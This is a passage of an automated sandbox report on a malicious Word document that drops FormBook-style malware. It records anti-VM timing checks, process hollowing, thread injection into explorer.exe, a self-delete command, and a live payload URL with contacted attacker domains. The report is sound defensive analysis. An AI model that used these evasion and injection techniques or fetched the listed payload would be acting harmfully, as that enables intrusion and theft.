          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ibeframnk863.exe PID: 2800, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000089B6E second address: 0000000000089B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2548Thread sleep time: -240000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2548Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe TID: 668Thread sleep time: -37510s >= -30000s
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe TID: 1232Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1188Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2836Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread delayed: delay time: 37510
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000007.00000000.467550341.000000000456F000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.467550341.000000000456F000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000007.00000000.467574386.000000000457A000.00000004.00000001.sdmpBinary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.421757574.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A826F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A126F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0040ACE0 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 63.250.43.8 80
          Source: C:\Windows\explorer.exeDomain query: www.personowner.guru
          Source: C:\Windows\explorer.exeDomain query: www.audiofactaesthetic.com
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 5E0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory written: C:\Users\user\AppData\Roaming\ibeframnk863.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread register set: target process: 1764
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe'
          Source: explorer.exe, 00000007.00000000.421919060.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694662183.0000000001DE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000007.00000000.421919060.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694662183.0000000001DE0000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000007.00000000.421919060.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694662183.0000000001DE0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeQueries volume information: C:\Users\user\AppData\Roaming\ibeframnk863.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 492582 Sample: PO.doc Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Multi AV Scanner detection for domain / URL 2->52 54 Found malware configuration 2->54 56 18 other signatures 2->56 9 EQNEDT32.EXE 11 2->9         started        14 WINWORD.EXE 291 23 2->14         started        process3 dnsIp4 38 fantecheo.tk 185.239.243.112, 49165, 80 CLOUDIE-AS-APCloudieLimitedHK Moldova Republic of 9->38 32 C:\Users\user\AppData\...\ibeframnk863.exe, PE32 9->32 dropped 34 C:\Users\user\AppData\...\ibefrankszx[1].exe, PE32 9->34 dropped 74 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->74 16 ibeframnk863.exe 9->16         started        36 C:\Users\user\Desktop\~$PO.doc, data 14->36 dropped file5 signatures6 process7 signatures8 44 Multi AV Scanner detection for dropped file 16->44 46 Tries to detect virtualization through RDTSC time measurements 16->46 48 Injects a PE file into a foreign processes 16->48 19 ibeframnk863.exe 16->19         started        22 ibeframnk863.exe 16->22         started        process9 signatures10 58 Modifies the context of a thread in another process (thread injection) 19->58 60 Maps a DLL or memory area into another process 19->60 62 Sample uses process hollowing technique 19->62 64 Queues an APC in another process (thread injection) 19->64 24 svchost.exe 19->24         started        27 explorer.exe 19->27 injected process11 dnsIp12 66 Modifies the context of a thread in another process (thread injection) 24->66 68 Maps a DLL or memory area into another process 24->68 70 Tries to detect virtualization through RDTSC time measurements 24->70 30 cmd.exe 24->30         started        40 www.audiofactaesthetic.com 63.250.43.8, 49167, 80 NAMECHEAP-NETUS United States 27->40 42 www.personowner.guru 99.83.154.118, 49166, 80 AMAZON-02US United States 27->42 72 System process connects to network (likely due to code injection or exploit) 27->72 signatures13 process14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO.doc43%VirustotalBrowse
          PO.doc29%ReversingLabsDocument-RTF.Exploit.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe20%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          C:\Users\user\AppData\Roaming\ibeframnk863.exe20%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.ibeframnk863.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          www.handelsbetriebposavec.com/if60/9%VirustotalBrowse
          www.handelsbetriebposavec.com/if60/0%Avira URL Cloudsafe
          http://fantecheo.tk/ibefrankszx.exe17%VirustotalBrowse
          http://fantecheo.tk/ibefrankszx.exe100%Avira URL Cloudmalware
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%VirustotalBrowse
          http://java.sun.com0%Avira URL Cloudsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.audiofactaesthetic.com
          63.250.43.8
          truefalse
            high
            fantecheo.tk
            185.239.243.112
            truefalse
              high
              www.personowner.guru
              99.83.154.118
              truefalse
                high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.handelsbetriebposavec.com/if60/true
                • 9%, Virustotal, Browse
                • Avira URL Cloud: safe
                low
                http://fantecheo.tk/ibefrankszx.exetrue
                • 17%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.windows.com/pctv.explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpfalse
                  high
                  http://investor.msn.comexplorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpfalse
                    high
                    http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpfalse
                      high
                      http://wellformedweb.org/CommentAPI/explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmpfalse
                        high
                        http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpfalse
                          high
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.hotmail.com/oeexplorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpfalse
                            high
                            http://treyresearch.netexplorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000007.00000000.434757196.0000000003DF8000.00000004.00000001.sdmpfalse
                              high
                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpfalse
                                high
                                http://java.sun.comexplorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.icra.org/vocabulary/.explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000007.00000000.463319655.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694748305.00000000031E0000.00000002.00020000.sdmpfalse
                                  high
                                  http://www.msn.com/de-de/?ocid=iehp4MP&explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpfalse
                                      high
                                      http://investor.msn.com/explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpfalse
                                        high
                                        http://www.msn.com/?ocid=iehpexplorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpfalse
                                          high
                                          https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=12explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.piriform.com/ccleanerexplorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpfalse
                                                high
                                                http://computername/printers/printername/.printerexplorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.%s.comPAexplorer.exe, 00000007.00000000.463319655.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694748305.00000000031E0000.00000002.00020000.sdmpfalse
                                                • URL Reputation: safe
                                                low
                                                http://www.autoitscript.com/autoit3explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpfalse
                                                  high
                                                  https://support.mozilla.orgexplorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpfalse
                                                    high
                                                    http://servername/isapibackend.dllexplorer.exe, 00000007.00000000.465106140.0000000003E50000.00000002.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    63.250.43.8
                                                    www.audiofactaesthetic.comUnited States
                                                    22612NAMECHEAP-NETUSfalse
                                                    185.239.243.112
                                                    fantecheo.tkMoldova Republic of
                                                    55933CLOUDIE-AS-APCloudieLimitedHKfalse
                                                    99.83.154.118
                                                    www.personowner.guruUnited States
                                                    16509AMAZON-02USfalse

                                                    General Information

                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                    Analysis ID:492582
                                                    Start date:28.09.2021
                                                    Start time:20:41:36
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 13m 11s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:PO.doc
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:12
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winDOC@12/8@3/3
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 12.8% (good quality ratio 12.3%)
                                                    • Quality average: 73.6%
                                                    • Quality standard deviation: 26.7%
                                                    HCA Information:
                                                    • Successful, ratio: 95%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .doc
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    20:42:20API Interceptor29x Sleep call for process: EQNEDT32.EXE modified
                                                    20:42:21API Interceptor114x Sleep call for process: ibeframnk863.exe modified
                                                    20:43:05API Interceptor131x Sleep call for process: svchost.exe modified
                                                    20:44:01API Interceptor1x Sleep call for process: explorer.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASN

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:downloaded
                                                    Size (bytes):624640
                                                    Entropy (8bit):7.132231741936528
                                                    Encrypted:false
                                                    SSDEEP:12288:kzqzgNi+hBr7IUAYpHOSpUeR7/UbuxaWsbkUb+3tkvfY:kvNi+hBr8UAGFBVUbuoWsbkUmgfY
                                                    MD5:CE20BD8F40F78DA603DD17D756745B0A
                                                    SHA1:2538F96FAD951489CD9BB84F9B76B107EA70EAA5
                                                    SHA-256:680993E1220C8D918F192AE23C5C01B6357C58AD68B7CC59FA122C09B7B85CDD
                                                    SHA-512:8138F5FDC8CD0BD806E123CD86FCEB559E7BAFB631D6244F36A86934BE822E6A89CBB9010CBCE8A9A22F9F0F70511E7D0059DE4E8407B9641ECE96848DF5D5D2
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                    Reputation:unknown
                                                    IE Cache URL:http://fantecheo.tk/ibefrankszx.exe
